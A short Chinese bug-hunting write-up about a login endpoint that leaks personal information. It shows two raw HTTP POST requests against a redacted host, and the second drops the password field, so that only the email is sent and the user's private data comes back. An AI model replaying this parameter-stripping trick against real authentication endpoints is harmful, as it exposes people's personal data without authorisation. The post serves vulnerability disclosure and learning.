记一次泄露PII的漏洞挖掘经历

HACK学习

发布于 2023-08-22 10:48:35

7560

发布于 2023-08-22 10:48:35

文章被收录于专栏：HACK学习

泄露PII的漏洞挖掘经历

什么是PII（Personal Identifiable Information）

个人可识别信息

这是有关一个人的数据，这些数据能帮助识别这个人，如姓名、指纹、电子邮件地址、电话号码等。

我使用提供的凭据进行测试，提交了我的用户名和密码并收到以下请求：

POST /auth?subdomain=test&commonLoginQuery=true HTTP/1.1
Host: redact.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 25
Origin: redact.com
Referer: redact.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"login":"test@gmail.com, "password": "test1337"}

我从请求中删除了密码字段及其值，如下：

POST /auth?subdomain=test&commonLoginQuery=true HTTP/1.1
Host: redact.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 25
Origin: redact.com
Referer: redact.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"login":"test@gmail.com"}

然后该用户的 PII 被泄露，并且显示了私人信息。